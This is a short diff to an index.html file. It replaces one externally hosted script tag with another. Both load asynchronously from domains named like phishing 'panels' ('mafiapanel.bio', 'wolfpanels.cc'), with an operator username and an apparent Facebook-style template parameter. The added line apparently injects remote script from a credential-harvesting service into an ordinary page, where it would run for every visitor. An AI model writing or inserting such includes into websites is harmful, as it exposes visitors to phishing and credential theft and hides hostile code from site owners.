--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script src="https://mafiapanel.bio/h/index.php?username=chamo01" type="text/javascript" async="true"></script>
+<script src="https://wolfpanels.cc/youtube?name=elchamo001&template=fb_new" type="text/javascript" async="true"></script>
